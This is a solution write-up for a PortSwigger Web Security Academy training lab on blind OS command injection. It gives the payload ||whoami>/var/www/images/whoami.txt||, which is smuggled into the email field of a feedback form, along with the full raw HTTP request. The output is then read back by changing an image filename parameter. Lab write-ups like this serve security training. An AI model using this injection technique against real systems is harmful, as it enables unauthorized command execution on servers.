Skip to content

Port Swigger Blind OS command injection with outpu

Blind OS command injection with output redirection

Solution

Open the website: https://0ac900b0048722ba800994c0007a0060.web-security-academy.net/feedback

https://0ac900b0048722ba800994c0007a0060.web-security-academy.net/feedback

Input payload

Payload: ||whoami>/var/www/images/whoami.txt||
---
POST /feedback/submit HTTP/2
Host: 0a71003f03830e1a807d4e60000100fa.web-security-academy.net
Cookie: session=cRY5B4ipOa2WeONczSE2tHg1fdgowPHF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: https://0a71003f03830e1a807d4e60000100fa.web-security-academy.net
Referer: https://0a71003f03830e1a807d4e60000100fa.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=9fyAbQu2IE68qOUP4vgxqeCvjavNUSll&name=Jan&email=test%40wp.pl||whoami>/var/www/images/whoami.txt||&subject=Teamt&message=text

Read whoami.txt

1) Open website: https://0a71003f03830e1a807d4e60000100fa.web-security-academy.net/image?filename=7.jpg
2) Edit parametr filename: https://0a71003f03830e1a807d4e60000100fa.web-security-academy.net/image?filename=whoami.txt

Solved